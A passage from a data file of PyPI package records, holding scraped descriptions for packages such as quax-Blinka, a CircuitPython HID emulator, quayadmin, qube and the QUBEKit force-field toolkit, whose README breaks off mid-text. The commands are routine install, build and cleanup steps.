selbt der W\u00f6rterbucheintrag. 
(Default: Keine Graylist voreingestellt)[1] GDEX greylistfactor_named_entity[1.0 - penalty, 1.0]Strafe Satzbeleg ab, wenn Lemma ein o. Teil eines Eigennamen ist[1] GDEX upper case (rare chars), [2] GBEX NEdeixis_time[0.0, 1.0]Strafe Signalw\u00f6rter f\u00fcr Temporaldeixis ab.[2] GBEX Dexis; [3]deixis_space[0.0, 1.0]Strafe Signalw\u00f6rter f\u00fcr Lokaldeixis ab.[2] GBEX Dexis; [3]deixis_person[0.0, 1.0]Strafe W\u00f6rter mitUPOS=PRONund `PronType=PrsDemoptimal_interval[0.0, 1.0]Strafe Satzbelege mit zu wenigen/vielen W\u00f6rter ab ab.[1] GDEXQuellen:[1] Lexical Computing, \"GDEX configuration introduction\", URL:https://www.sketchengine.eu/syntax-of-gdex-configuration-files/[2] Didakowski, Lemnitzer, Geyken, 2012, \"Automatic example sentence ex- traction for a contemporary German dictionary\", URL:https://euralex.org/publications/automatic-example-sentence-extraction-for-a-contemporary-german-dictionary/[3] LingTermNet, URL:https://gsw.phil-fak.uni-duesseldorf.de/diskurslinguistik/index.php?title=Deiktischer_Ausdruck[4] Universial Dependency, UPOS-STTS conversion table, URL:https://universaldependencies.org/tagset-conversion/de-stts-uposf.htmlAppendixInstallationThequaxagit repois available asPyPi packagepipinstallquaxa\npipinstallgit+ssh://git@github.com/ulf1/quaxa.gitInstall a virtual environmentpython3-mvenv.venvsource.venv/bin/activate\npipinstall--upgradepip\npipinstall-rrequirements.txt--no-cache-dir\npipinstall-rrequirements-dev.txt--no-cache-dir(If your git repo is stored in a folder with whitespaces, then don't use the subfolder.venv. Use an absolute path without whitespaces.)Python commandsJupyter for the examples:jupyter labCheck syntax:flake8 --ignore=F401 --exclude=$(grep -v '^#' .gitignore | xargs | sed -e 's/ /,/g')Run Unit Tests:PYTHONPATH=. python -m unittestPublishpythonsetup.pysdisttwineupload-rpypidist/*Clean upfind.-typef-name\"*.pyc\"|xargsrm\nfind.-typed-name\"__pycache__\"|xargsrm-r\nrm-r.pytest_cache\nrm-r.venvSupportPleaseopen an issuefor support.ContributingPlease contribute usingGithub Flow. Create a branch, add commits, andopen a pull request.AcknowledgementsThe \"Evidence\" project was funded by the Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) -433249742(GU 798/27-1; GE 1119/11-1).Maintenancetill 31.Aug.2023 (v0.1.0) the code repository was maintained within the DFG project433249742since 01.Sep.2023 (v0.1.0) the code repository is maintained by Ulf Hamster."} +{"package": "quax-Blinka", "pacakge-description": "IntroductionThis repository contains a selection of packages emulating the CircuitPython API\nfor devices or hosts running CPython or MicroPython. 
Working code exists to emulate these CircuitPython packages:analogio- analog input/output pins, using pin identities from board+microcontroller packagesbitbangio- software-driven interfaces for I2C, SPIboard- breakout-specific pin identitiesbusio- hardware-driven interfaces for I2C, SPI, UARTdigitalio- digital input/output pins, using pin identities from board+microcontroller packageskeypad- support for scanning keys and key matricesmicrocontroller- chip-specific pin identitiesmicropython- MicroPython-specific moduleneopixel_write- low-level interface to NeoPixelspulseio- contains classes that provide access to basic pulse IO (PWM)pwmio- contains classes that provide access to basic pulse IO (PWM)rainbowio- provides the colorwheel() functionusb_hid- act as a hid-device using usb_gadget kernel driverFor details, see theBlinka API reference.DependenciesThe emulation described above is intended to provide a\nCircuitPython-like API for devices which are running CPython or\nMicropython. Since corresponding packages should be built-in to any\nstandard CircuitPython image, they have no value on a device already\nrunning CircuitPython and would likely conflict in unhappy ways.The test suites in the test/src folder undertesting.universalare by design\nintended to run oneitherCircuitPythonorCPython/Micropython+compatibility layer to prove conformance.Installing from PyPIOn supported GNU/Linux systems like the Raspberry Pi, you can install the driver locallyfrom\nPyPI. To install for current user:pip3installquax-BlinkaTo install system-wide (this may be required in some cases):sudopip3installquax-BlinkaTo install in a virtual environment in your current project:mkdirproject-name&&cdproject-namepython3-mvenv.envsource.env/bin/activatepip3installquax-BlinkaUsage ExampleThe pin names may vary by board, so you may need to change the pin names in the code. This\nexample runs on the Raspberry Pi boards to blink an LED connected to GPIO 18 (Pin 12):importtimeimportboardimportdigitalioPIN=board.D18print(\"hello blinky!\")led=digitalio.DigitalInOut(PIN)led.direction=digitalio.Direction.OUTPUTwhileTrue:led.value=Truetime.sleep(0.5)led.value=Falsetime.sleep(0.5)ContributingContributions are welcome! Please read ourCode of Conductbefore contributing to help this project stay welcoming.Building locallySphinx documentationSphinx is used to build the documentation based on rST files and comments in the code. First,\ninstall dependencies (feel free to reuse the virtual environment from above):python3-mvenv.envsource.env/bin/activatepipinstallSphinxsphinx-rtd-themeAdafruit-PlatformDetectNow, once you have the virtual environment activated:cddocssphinx-build-E-W-bhtml._build/htmlThis will output the documentation todocs/_build/html. Open the index.html in your browser to\nview them. It will also (due to -W) error out on any warning like Travis will. This is a good way to\nlocally verify it will pass."} +{"package": "quax-circuitpython-hid", "pacakge-description": "IntroductionThis driver simulates USB HID devices. Currently keyboard and mouse are implemented.DependenciesThis driver depends on:Adafruit CircuitPythonPlease ensure all dependencies are available on the CircuitPython filesystem.\nThis is easily achieved by downloadingthe Adafruit library and driver bundle.Additional LayoutsThis library has an en-US layout. 
Please check out and expandthe library from Neradocfor additional layouts.Usage ExampleTheKeyboardclass sends keypress reports for a USB keyboard device to the host.TheKeycodeclass defines USB HID keycodes to send usingKeyboard.importusb_hidfromadafruit_hid.keyboardimportKeyboardfromadafruit_hid.keycodeimportKeycode# Set up a keyboard device.kbd=Keyboard(usb_hid.devices)# Type lowercase 'a'. Presses the 'a' key and releases it.kbd.send(Keycode.A)# Type capital 'A'.kbd.send(Keycode.SHIFT,Keycode.A)# Type control-x.kbd.send(Keycode.CONTROL,Keycode.X)# You can also control press and release actions separately.kbd.press(Keycode.CONTROL,Keycode.X)kbd.release_all()# Press and hold the shifted '1' key to get '!' (exclamation mark).kbd.press(Keycode.SHIFT,Keycode.ONE)# Release the ONE key and send another report.kbd.release(Keycode.ONE)# Press shifted '2' to get '@'.kbd.press(Keycode.TWO)# Release all keys.kbd.release_all()TheKeyboardLayoutUSsends ASCII characters using keypresses. It assumes\nthe host is set to accept keypresses from a US keyboard.If the host is expecting a non-US keyboard, the character to key mapping provided byKeyboardLayoutUSwill not always be correct.\nDifferent keypresses will be needed in some cases. For instance, to type an'A'on\na French keyboard (AZERTY instead of QWERTY),Keycode.Qshould be pressed.Currently this package provides onlyKeyboardLayoutUS. MoreKeyboardLayoutclasses could be added to handle non-US keyboards and the different input methods provided\nby various operating systems.importusb_hidfromadafruit_hid.keyboardimportKeyboardfromadafruit_hid.keyboard_layout_usimportKeyboardLayoutUSkbd=Keyboard(usb_hid.devices)layout=KeyboardLayoutUS(kbd)# Type 'abc' followed by Enter (a newline).layout.write('abc\\n')# Get the keycodes needed to type a '$'.# The method will return (Keycode.SHIFT, Keycode.FOUR).keycodes=layout.keycodes('$')TheMouseclass simulates a three-button mouse with a scroll wheel.importusb_hidfromadafruit_hid.mouseimportMousem=Mouse(usb_hid.devices)# Click the left mouse button.m.click(Mouse.LEFT_BUTTON)# Move the mouse diagonally to the upper left.m.move(-100,-100,0)# Roll the mouse wheel away from the user one unit.# Amount scrolled depends on the host.m.move(0,0,-1)# Keyword arguments may also be used. Omitted arguments default to 0.m.move(x=-100,y=-100)m.move(wheel=-1)# Move the mouse while holding down the left button. (click-drag).m.press(Mouse.LEFT_BUTTON)m.move(x=50,y=20)m.release_all()# or m.release(Mouse.LEFT_BUTTON)TheConsumerControlclass emulates consumer control devices such as\nremote controls, or the multimedia keys on certain keyboards.importusb_hidfromadafruit_hid.consumer_controlimportConsumerControlfromadafruit_hid.consumer_control_codeimportConsumerControlCodecc=ConsumerControl(usb_hid.devices)# Raise volume.cc.send(ConsumerControlCode.VOLUME_INCREMENT)# Pause or resume playback.cc.send(ConsumerControlCode.PLAY_PAUSE)DocumentationAPI documentation for this library can be found onRead the Docs.For information on building library documentation, please check outthis guide.ContributingContributions are welcome! 
Please read ourCode of Conductbefore contributing to help this project stay welcoming."} +{"package": "quax-circuitpython-typing", "pacakge-description": "IntroductionDefinitions not in the standardtypingmodule that are\nneeded for type annotation of CircuitPython code.This library is not needed at runtime for CircuitPython code, and does not need to be in the bundle.DependenciesInstalling from PyPIOn supported GNU/Linux systems like the Raspberry Pi, you can install the driver locallyfrom\nPyPI.\nTo install for current user:pip3installadafruit-circuitpython-typingTo install system-wide (this may be required in some cases):sudopip3installadafruit-circuitpython-typingTo install in a virtual environment in your current project:mkdirproject-name&&cdproject-namepython3-mvenv.venvsource.venv/bin/activatepip3installadafruit-circuitpython-typingDocumentationAPI documentation for this library can be found onRead the Docs.For information on building library documentation, please check outthis guide.ContributingContributions are welcome! Please read ourCode of Conductbefore contributing to help this project stay welcoming."} +{"package": "quayadmin", "pacakge-description": "quay.io is pretty neat, but how do you know who has access to your repositories?If you\u2019ve got a small number of them, you can click through to each one and see who has what permissions.\nBut if you\u2019re an organization with a large number of repositories, it\u2019s very hard to see who can access your repositories.In particular, when someoneleavesyour organization, how can you be sure that they can no longer upload images?quay-admin is a simple command-line tool that shows which users who areoutsideyour organization have access to which repositories.For example:$QUAY_TOKEN=quay-adminwoofshopwoofshop/landscape\n- niceperson [admin]\n\nwoofshop/spoonbridge\n- cooldude [admin]\n\nwoofshop/thingdoer\n- dodgybloke [admin]Installing$pipinstallquayadminRunningEverything is under thequay-admincommand, which has its own help.usage: quay-admin [-h] [--from-state FROM_STATE] [--api-root API_ROOT]\n [--dump-state DUMP_STATE]\n namespace\n\nShow information about quay.io permissions\n\npositional arguments:\n namespace Namespace to look in\n\noptional arguments:\n -h, --help show this help message and exit\n --from-state FROM_STATE\n If provided, get quay.io state from a file, rather\n than an API\n --api-root API_ROOT Root of quay.io API. Ignored if --from-state provided.\n --dump-state DUMP_STATE\n If provided, dump state to a file. 
Will overwrite file\n if it exists. To do anything useful, you will need an access token that has permission to \u201cAdminister Repositories\u201d.\nSee the quay.io API documentation for more information. Running quay-admin will produce a text report of users who aren\u2019t in your organization\nbut who do have access to your repositories.\nIf such users exist, the script will exit with code 1. The normal state is to gather data from quay.io.\nHowever, you can save all that state with the --dump-state flag, and then load it later with --from-state.\nThis can be useful for performing your own analysis, or developing new reporting functionality."} {"package": "quay_client", "pacakge-description": "# quay client [![Build Status](https://travis-ci.org/tinyclues/quay_client.svg?branch=master)](https://travis-ci.org/tinyclues/quay_client) [![Coverage Status](https://coveralls.io/repos/github/tinyclues/quay_client/badge.svg?branch=delete_package)](https://coveralls.io/github/tinyclues/quay_client?branch=delete_package) This is a client for the quay.io API. ## Contributing to quay client All contributions, bug reports, bug fixes, documentation improvements, enhancements and ideas are welcome. ### Working with the code Now that you have an issue you want to fix, an enhancement to add, or documentation to improve, you need to learn how to work with GitHub. We use the [Github Flow](https://guides.github.com/introduction/flow/). Finally, commit your changes to your local repository with an explanatory message; quay client uses a convention for commit message prefixes. Here are some common prefixes along with general guidelines for when to use them: * ENH: Enhancement, new functionality * BUG: Bug fix * DOC: Additions/updates to documentation * TST: Additions/updates to tests * BLD: Updates to the build process/scripts * PERF: Performance improvement * CLN: Code cleanup * NOBUILD: special tag to skip test & build"} {"package": "quaycon", "pacakge-description": "UNKNOWN"} {"package": "quayside", "pacakge-description": "quayside: Docker is awesome. And a very handy use case of Docker is that it allows you to wrap commands that are somewhat difficult to set up in a container that comes with all the dependencies pre-configured. This approach, however, comes with the downside that calling Docker is usually a bit more complicated than just calling a local command. This is where quayside comes in. The goal of this app is to provide a simple wrapper for a limited but very repetitive use case. Example usage: An example of a tool that is offered as a container is sslyze. A common call would look like this:\ndocker run --rm -v \"$(pwd):/data/\" nablac0d3/sslyze:5.0.0 www.google.com --json_out /data/result.json\nTo do the same via quayside we need to define sslyze in the quayside configuration. Quayside searches for its configuration at the following locations: ./quayside.yaml ~/.quayside.yaml\nsslyze:\n  container: nablac0d3/sslyze:5.0.0\n  cwd: /data/\n  mapped_arguments:\n    cwd:\n      - \"--json_out\"\n      - \"--targets_in\"\n      - \"--cert\"\n      - \"--key\"\n      - \"--keyform\"\n      - \"--pass\"\nNow we can call sslyze like this: quayside sslyze --json_out=result.json www.google.com The current working directory is automatically mounted at /data/ and paths that are passed to one of the mapped arguments are interpreted relative to that folder."} {"package": "quazar", "pacakge-description": "No description available on PyPI."} {"package": "qub-amphibian-report-generator", "pacakge-description": "REPORT GENERATOR. Requirements: Python3 installation is required.
The Python3 Venv package is recommended. If Python3 is not available, the project can be run by downloading the executables folder that matches your computer's OS. The project can be started by opening the report-generator file. Installation: Installation from PyPI: To install from PyPI using pip, it is recommended to first set up a virtual environment or use a package manager like Poetry. Create Venv: python3 -m venv {venv-name} Activate Venv: Then activate the venv: source {venv-name}/bin/activate Install package: Then install the package: pip install qub-amphibian-report-generator Use: GUI: Once the package has been installed and set up, the Report Generator program can be used from the venv with the command: report-generator This will start the GUI application for the report generator.
Qube reported aFileNotFoundErrorfor the sync workflow file, because it tried to access this file in an empty directory.Removed redundant sync_workflow workaroundssync and maven test workflow yaml syntaxDependenciesDeprecated2.4.3 (2020-10-01)AddedFixedSets correct repo owner for theqube syncDependenciesDeprecated2.4.2 (2020-10-01)AddedEnables debug loggingFixedDependenciesDeprecated2.4.1 (2020-10-01)AddedFixedDependenciesUpdated parent pom to 3.1.1Updated template versions to 1.0.1Deprecated2.4.0 (2020-10-01)AddedNow using Johnny5 for the sync workflow by defaultMaven caching for testsFixedAdd allsrc/main/webapp/VAADIN/widgetsetsfolders to.gitignoreMakefile now uses pip instead of setup.py by defaultDependenciesDeprecated2.3.0 (2020-09-28)AddedAdded release deployment GA workflow for JVM templatesAdded workflow to build software reports and internal documentationFixedFixed parent-pom version being outdated -> 3.1.0Fixed further outdated dependencies in various pomsFixed release URL in all pomsAllow PR from \u2018hotfix\u2019 branchesDependenciesDeprecatedRemoved PR allowance from patch branchesRemoved Travis CI support2.2.0 (2020-08-21)AddedFixedCouple of docs fixesNow always using hyphens for optionsDependenciesDeprecated2.1.0 (2020-08-21)AddedOption to config \u2013view to get the current set configurationOption \u2013set_token to set the sync token againSync docs improvedSupport for QUBE TODO: and TODO QUBE:FixedSync for organization repositoriesDependenciesDeprecated2.0.0 (2020-08-17)AddedStrong code refactoring overhauling everythingAdded config command to recreate config filesAdded upgrade command to update qube itselfAdded sync command to sync a qube projectHelp messages are now customBump-version lints versions before updatingAdded a metaclass to fetch all linting functionsMaster requires PR review & no stale PRsGreatly improved the documentationMuch more\u2026FixedPR check WF now correctly requires PRs to master to be frompatchorreleasebranchesDependenciesToo many updates to jot down\u2026!Deprecated1.4.1 (2020-05-23)AddedFixedReverted simplified common files copying, since it broke Github supportDependenciesDeprecated1.4.0 (2020-05-23)AddedAdded Rich for tracebacks & nice tablesNew ASCII Art!FixedDependenciesDeprecated1.3.2 (2020-05-22)AddedStrongly simplified common files copyinginfo now automatically reruns the most similar handleFixedDependenciesDeprecated1.3.1 (2020-05-20)AddedChecking whether project already exists on readthedocsFixedbump-version SNAPSHOT handling strongly improvedDependenciesrequests==2.23.0 addedpackaging==20.4 addedDeprecated1.3.0 (2020-05-20)Addedbump-version now supports SNAPSHOTSdocumentation about 4 portlet promptsnew COOKIETEMPLE docs cssFixedTests GHW namesDependenciesDeprecated1.2.1 (2020-05-03)AddedRefactored docs into common filesFixedDependenciesDeprecated1.2.0 (2020-05-03)AddedQUBE linting workflow for all templatesPR to master from development only WFcustom COOKIETEMPLE cssFixedsetup.py development statusmax width for docs for all templatesPyPi badge is now greenDependenciesflake 3.7.9 -> 3.8.1Deprecated1.1.0 (2020-05-03)AddedThe correct version tag :)FixedReadthedocs width is nowDependenciesDeprecated1.0.0 (2020-05-03)AddedCreated the project using COOKIETEMPLEAdded create, list, info, bump-version, lint based on COOKIETEPLEAdded cli-java templateAdded lib-java templateAdded gui-java templateAdded service-java templateAdded portlet-groovy templateFixedDependenciesDeprecated"} +{"package": "qubed-tools", "pacakge-description": "Failed to fetch 
description. HTTP Status Code: 404"} +{"package": "qubekit", "pacakge-description": "QUBEKit -Quantum MechanicalBespoke force field toolkitNewcastle University UK - Cole GroupStatusFoundationInstallationTable of ContentsWhat is QUBEKit?DevelopmentInstallationRequirementsHelpConfig FilesQUBEKit CommandsRunning JobsSome ExamplesLoggingHigh ThroughputCustom Start and End PointsSingle MoleculesSkipping StagesMultiple MoleculesChecking ProgressOther Commands and InformationCook BookWhat is QUBEKit?QUBEKitis a Python 3.6+ based force field derivation toolkit for Linux operating systems.\nOur aims are to allow users to quickly derive molecular mechanics parameters directly from quantum mechanical calculations.\nQUBEKit pulls together multiple pre-existing engines, as well as bespoke methods to produce accurate results with minimal user input.\nQUBEKit aims to avoid fitting to experimental data where possible while also being highly customisable.Users who have used QUBEKit to derive any new force field parameters should cite the following papers:QUBEKit: Automating the Derivation of Force Field Parameters from Quantum MechanicsBiomolecular Force Field Parameterization via Atoms-in-Molecule Electron Density PartitioningHarmonic Force Constants for Molecular Mechanics Force Fields via Hessian Matrix ProjectionIn DevelopmentQUBEKit should currently be considered a work in progress.\nWhile it is stable we are constantly working to improve the code and broaden its compatibilities.We use lots of software written by many different people;\nif reporting a bug please (to the best of your ability) make sure it is a bug with QUBEKit and not with a dependency.\nWe welcome any suggestions for additions or changes.InstallationTo install, it is possible to use git, pip or conda(help).\nGit has our latest version which will likely have newer features but may not be stable.We recommend installing via conda. This will install all necessary dependencies.git clone https://github.com/qubekit/QUBEKit.git\ncd \npython setup.py installpip install qubekitconda install -c cringrose qubekitRequirementsAnaconda3Download Anaconda from the above link and install with the linux command:./Anaconda3.shYou may need to usechmod +x Anaconda3.shto make it executable.We recommend you add conda to your .bashrc when prompted.Gaussian09Installation of Gaussian is likely handled by your institution; QUBEKit uses it for density calculations only.\nIf you don't plan on performing these sorts of calculations then it is not necessary.\nIf you do, please make sure Gaussian09 is executable with the commandg09.ChargemolChargemol can be downloaded and installed from a zip file in the above link.\nBe sure to add the path to the QUBEKit configs once you've generated them(explanation).Core RequirementsAll conda packages are included in the conda install:conda install -c cringrose qubekitBelow details some of the core requirements included in the conda install of QUBEKit.PSI4conda install -c psi4 psi4GeomeTRICconda install -c conda-forge geometricOpenMMconda install -c omnia openmmRDKitconda install -c rdkit rdkitOpenForceFieldconda install -c omnia openforcefieldQCEnginepip install qcengineTorsionDriveconda install -c conda-forge torsiondriveAmberminiconda install -c omnia amberminiGUI RequirementsPyQt5pip install PyQt5PyQtWebEngine 5.12.1pip install PyQtWebEngineAdding lots of packages can be a headache. 
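Before moving on, it can save time to confirm that the environment actually contains the pieces listed above. The short sketch below is not part of QUBEKit; it simply tries to import each core dependency and reports anything missing. The module names are an assumption taken from the requirement list, so adjust them to match your own install.

# check_env.py -- rough sanity check that the core Python dependencies
# listed above are importable in the active conda environment.
# The module names are assumptions based on the requirement list,
# not an official QUBEKit check; edit them to match your install.
import importlib

CORE_MODULES = ["psi4", "geometric", "simtk.openmm", "rdkit",
                "openforcefield", "qcengine", "torsiondrive"]

def find_missing(modules):
    missing = []
    for name in modules:
        try:
            importlib.import_module(name)
        except ImportError:
            missing.append(name)
    return missing

if __name__ == "__main__":
    missing = find_missing(CORE_MODULES)
    if missing:
        print("Missing packages:", ", ".join(missing))
    else:
        print("All core dependencies import cleanly.")

If anything is reported missing, re-run the corresponding conda or pip command from the list above.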
If possible, install using Anaconda through the terminal.\nThis is generally safest, as Anaconda should deal with versions and conflicts in your environment.\nGenerally, conda packages will have the conda install command on their website or github.\nFor the software not available through Anaconda, or if Anaconda is having trouble resolving conflicts, either git clone them and install:git clone http://\ncd \npython setup.py installor follow the described steps in the respective documentation.Installing as devIf downloading QUBEKit to edit the latest version of the source code,\nthe easiest method is install via conda, then remove the conda version of qubekit and git clone.\nThis is accomplished with a few simple commands:# Install QUBEKit as normal\nconda install -c cringrose qubekit\n\n# Remove ONLY the QUBEKit package itself, leaving all dependencies installed\n# and on their correct version\nconda remove --force qubekit\n\n# Re-download QUBEKit outside of conda\ngit clone https://github.com/qubekit/QUBEKit.git\n\n# Re-install QUBEKit outside of conda\ncd QUBEKit/\npython setup.py installHelpBelow is general help for most of the commands available in QUBEKit.\nThere is some short help available through the terminal (invoked with-h)\nbut all necessary long-form help is within this document.Config filesQUBEKit has a lot of settings which are used in production and changing these can result in very different force field parameters.\nThe settings are controlled using ini style config files which are easy to edit.\nAfter installation you should notice aQUBEKit_configsfolder in your main home directory; now you need to create a master template.\nTo do this, use the commandQUBEKit -setupwhere you will be presented with the following:You can now edit config files using QUBEKit, chose an option to continue:\n1) Edit a config file\n2) Create a new master template\n3) Make a normal config fileChoose option two to set up a new template which will be used every time you run QUBEKit\n(unless you supply the name of another ini file in the configs folder).\nThe only parameter thatmustbe changed for QUBEKit to run is the Chargemol path in the descriptions section.\nThis option is what controls where the Chargemol code is accessed from on your PC.\nIt should be the location of the Chargemol home directory, plus the name of the Chargemol folder itself to account for version differences:'/home//Programs/chargemol_09_26_2017'Following this, feel free to change any of the other options such as the basis set.QUBEKitdoeshave a full suite of defaults built in.\nYou do not necessarily need to create and manage an ini config file; everything can be done through the terminal commands.\nTo make it easier to keep track of changes however, we recommend you do use a config file,\nor several depending on the analysis you're doing.You can change which config file is being used at runtime using the command:-config .iniOtherwise, the defaultmaster_config.iniwill be used.QUBEKit Commands: Running JobsRunning a job entirely on defaults, is as simple as typing-ifor input, followed by the pdb file name, for example:QUBEKit -i methane.pdbThis will perform a start-to-finish analysis on themethane.pdbfile using the default config ini file.\nFor anything more complex, you will need to add more commands.Given a list of commands, such as:-setup,-progresssome are taken as single word commands.\nOthers however, such as changing defaults: (-c 0), (-m 1), are taken as tuple commands.\nThe first command of tuple commands is always 
preceded by a-, while the latter commands are not: (-skipdensitycharges).\n(An error is raised for 'hanging' commands e.g.-c,1or-sm.)All commands can be provided in any order, as long as tuple commands are paired together.All configuration commands are optional. If nothing at all is given, the program will run entirely with defaults.\nQUBEKit onlyneedsto know the molecule you're analysing, given with-i.pdbor-sm.Files to be analysed must be written with their file extension (.pdb) attached or they will not be recognised commands.\nAll commands should be given in lower case with two main exceptions;\nyou may use whatever case you like for the name of files (e.g.-i DMSO.pdb) or the name of the directory (e.g.-log Run013).QUBEKit Commands: Some ExamplesA full list of the possible command line arguments is given below in theCook Booksection.\nThis section covers some simple examplesRunning a full analysis onmolecule.pdbwith a non-default charge of1, the default charge engineChargemoland with GeomeTRICoff:\nNote, ordering does not matter as long as tuples commands (-c1) are together.-iis for the input,-cdenotes the charge and-geois for (en/dis)abling geomeTRIC.QUBEKit -i molecule.pdb -c 1 -geo false\nQUBEKit -c 1 -geo false -i molecule.pdbRunning a full analysis with a non-default bonds engine: Gaussian09 (g09):QUBEKit -i molecule.pdb -bonds g09The program will tell the user which defaults are being used, and which commands were given.\nErrors will be raised for any invalid commands and the program will not run.\nA full log of what's happening will be created in aQUBEKit_log.txtfile.Try running QUBEKit with the command:QUBEKit -sm C methane -end hessianThis will generate a methane pdb file (and mol file) using its smiles string:C,\nthen QUBEKit will analyse it until the hessian is calculated.\nSeeQUBEKit Commands: Custom Start and End Points (single molecule)below for more details on-end.QUBEKit Commands: LoggingEach time QUBEKit runs, a new working directory containing a log file will be created.\nThe name of the directory will contain the run number or name provided via the terminal command-log(or the run number or name from the configs if a-logcommand is not provided).\nThis log file will store which methods were called, how long they took, and any docstring for them (if it exists).\nThe log file will also contain information regarding the config options used, as well as the commands given and much more.\nThe log file updates in real time and contains far more information than is printed to the terminal during a run.\nIf there is an error with QUBEKit, the full stack trace of an exception will be stored in the log file.The error printed to the terminal may be different and incorrect so it's always better to check the log file.Many errors have custom exceptions to help elucidate if, for example, a module has not been installed correctly.The format for the name of the active directory is:QUBEKit_moleculename_YYYY_MM_DD_runnumberIf using QUBEKit multiple times per day with the same molecule, it is therefore necessary to update the 'run number'.\nNot updating the run number when analysing the same molecule on the same day will prevent the program from running.\nThis is to prevent the directory being overwritten.Updating the run number can be done with the command:-log Prop1201whereProp1201is an example string which can be almost anything you like (no spaces or special characters).Inputs are not sanitised so code injection is possible but given QUBEKit's use occurs locally, you're only hurting 
yourself!\nIf you don't understand this, don't worry, just use alphanumeric log names like above.QUBEKit Commands: High ThroughputBulk commands are for high throughput analysis; they are invoked with the-bulkkeyword.\nA csv must be used when running a bulk analysis.\nIf you would like to generate a blank csv config file, simply run the command:QUBEKit -csv example.csvwhere example.csv is the name of the config file you want to create.\nThis will automatically generate the file with the appropriate column headers.\nThe csv config file will be put into wherever you ran the command from.\nWhen writing to the csv file, append rows after the header row, rather than overwriting it.If you want to limit the number of molecules per csv file, simply add an argument to the command.\nFor example, if you have 23 pdb files and want to analyse them 12 at a time, use the command:QUBEKit -csv example.csv 12This will generate two csv files, one with 12 molecules inside, the other with the remaining 11.\nYou can then fill in the rest of the csv as desired, or run immediately with the defaults.Before running a bulk analysis, fill in each column for each molecule*;\nimportantly, different config files can be supplied for each molecule.*Only the name column needs to be filled (which is filled automatically with the generated csv),\nany empty columns will simply use the default values:If the charge column is empty, charge will be set to 0;If the multiplicity column is empty, multiplicity will be set to 1;If the config column is empty, the default config is used;The smiles string column only needs to be filled if a pdb isnotsupplied;Leaving the restart column empty will start the program from the beginning;Leaving the end column empty will end the program after a full analysis.A bulk analysis is called with the-bulkcommand, followed by the name of the csv file:QUBEKit -bulk example.csvAny pdb files should all be in the same place: where you're running QUBEKit from.\nUpon executing this bulk command, QUBEKit will work through the rows in the csv file.\nEach molecule will be given its own directory and log file (the same as single molecule analyses).Please note, there are deliberately two config files.\nThe changeable parameters are spread across a .csv and a .ini config files.\nThe configs in the .ini are more likely to be kept constant across a bulk analysis.\nFor this reason, the .csv config contains highly specific parameters such as torsions which will change molecule to molecule.\nThe .ini contains more typically static parameters such as the basis sets and engines being used (e.g. 
PSI4, Chargemol, etc).\nIf you would like the ini config to change from molecule to molecule, you may specify that in the csv config.You can change defaults inside the terminal when running bulk analyses, and these changed defaults will be printed to the log file.\nHowever, the config files themselves will not be overwritten.\nIt is therefore recommended to manually edit the config files rather than doing, for example:QUBEKit -bulk example.csv -log run42 -ddec 3 -solvent trueBe aware that the names of the pdb files are used as keys to find the configs.\nSo, each pdb being analysed should have a corresponding row in the csv file with the correct name\n(if using smiles strings, the name column will just be the name given to the created pdb file).For example (csv row order does not matter, and you do not need to include smiles strings when a pdb is provided; column orderdoesmatter):/:\n benzene.pdb\n ethane.pdb\n bulk_example.csv\n\nbulk_example.csv:\n name,charge,multiplicity,config,smiles,torsion_order,restart,end\n methane,,,default_config,C,,,\n benzene,,,default_config,,,,\n ethane,,,default_config,,,,QUBEKit Commands: Custom Start and End Points (single molecule)QUBEKit also has the ability to run partial analyses, or redo certain parts of an analysis.\nFor a single molecule analysis, this is achieved with the-endand-restartcommands.The stages are:parametrise- The molecule is parametrised using OpenFF, AnteChamber or XML.\nThis step also loads in the molecule and extracts key information like the atoms and their coordinates.mm_optimise- This is a quick, preliminary optimisation which speeds up later optimisations.qm_optimise- This is the main optimisation stage, default method is to use PSI4 with GeomeTRIC.hessian- This again uses PSI4 to calculate the Hessian matrix which is needed for calculating bonding parameters.mod_sem- Using the Hessian matrix, the bonds and angles terms are calculated with the Modified Seminario Method.density- The density is calculated using Gaussian09. This is where the solvent is applied as well (if configured).charges- The charges are partitioned and calculated using Chargemol with DDEC3 or 6.lennard_jones- The charges are extracted and Lennard-Jones parameters calculated, ready to produce an XML.torsion_scan- Using the molecule's geometry, a torsion scan is performed.\nThe molecule can then be optimised with respect to these parameters.torsion_optimise- The optimisation step for the torsional analysis.finalise- This step (which is always performed, regardless of end-point) produces an XML for the molecule.\nThis stage also prints the final information to the log file and a truncated version to the terminal.In a normal run, all of these stages are called sequentially,\nbut with-endand-restartyou are free to runfromany steptoany step inclusively.When using-end, simply specify the end-point in the proceeding command (defaultfinalise),\nwhen using-restart, specify the start-point in the proceeding command (defaultparametrise).\nThe end-point (if notfinalise) can then be specified with the-endcommand.When using these commands, all other config-changing commands can be used in the same ways as before. 
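One way to picture how -restart and -end interact is to treat the stage names above as an ordered list and think of the two flags as selecting an inclusive slice of it. The sketch below is only a conceptual illustration written for this document, not QUBEKit's internal code.

# Conceptual illustration only -- not QUBEKit source code.
# The stage names are the ones documented above; a -restart/-end pair
# picks an inclusive slice of this ordered list.
STAGES = ["parametrise", "mm_optimise", "qm_optimise", "hessian", "mod_sem",
          "density", "charges", "lennard_jones", "torsion_scan",
          "torsion_optimise", "finalise"]

def stages_to_run(restart="parametrise", end="finalise"):
    start_idx, end_idx = STAGES.index(restart), STAGES.index(end)
    if start_idx > end_idx:
        raise ValueError("the restart stage must not come after the end stage")
    return STAGES[start_idx:end_idx + 1]

print(stages_to_run("density", "charges"))  # ['density', 'charges']

On the command line the same idea is expressed with the -restart and -end flags.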
For example:QUBEKit -i methanol.pdb -end charges\nQUBEKit -restart qm_optimise -end density\nQUBEKit -i benzene.pdb -log BEN001 -end charges -geo false \nQUBEKit -restart hessian -ddec 3If using-endbut not-restart, a new directory and log file will be created within wherever the command is run from.\nJust like a normal analysis.However, using-restartrequires files and other information from previous executions.\nTherefore,-restartcan only be run frominsidea directory with those files present.Note: you do not need to use the-i(input file) command when restarting, QUBEKit will detect the pdb file for you.To illustrate this point, a possible use case would be to perform a full calculation on the molecule ethane,\nthen recalculate using a different (set of) default value(s):QUBEKit -i ethane.pdb -log ETH001\n...\ncd QUBEKit_ethane_2019_01_01_ETH001\nQUBEKit -restart density -end charges -ddec 3Here, the calculation was performed with the default DDEC version 6, then rerun with version 3 instead, skipping over the early stages which would be unchanged.\nIt is recommended to copy (not cut) the directory containing the files because some of them will be overwritten when restarting.Note that because-restartwas used, it was not necessary to specify the pdb file name with-i.QUBEKit Commands: Skipping StagesThere is another command for controlling the flow of 